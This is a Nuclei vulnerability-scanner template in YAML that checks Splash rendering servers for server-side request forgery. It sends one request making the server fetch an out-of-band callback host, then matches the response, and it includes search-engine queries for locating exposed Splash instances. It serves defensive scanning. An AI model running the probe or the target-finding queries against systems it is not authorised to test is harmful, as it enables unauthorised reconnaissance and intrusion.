nuclei-templates/http/vulnerabilities/splash/splash-render-ssrf.yaml

32 lines
665 B
YAML

id: splash-render-ssrf
info:
name: Splash Render - SSRF
author: pwnhxl
severity: high
reference:
- https://github.com/scrapinghub/splash
- https://b1ngz.github.io/splash-ssrf-to-get-server-root-privilege/
metadata:
max-request: 1
verified: true
shodan-query: title:"Splash"
hunter-query: web.title="Splash" && header="TwistedWeb"
tags: splash,ssrf,oast,oss
http:
- method: GET
path:
- "{{BaseURL}}/render.html?url=https://oast.live"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Interactsh Server'
- type: status
status:
- 200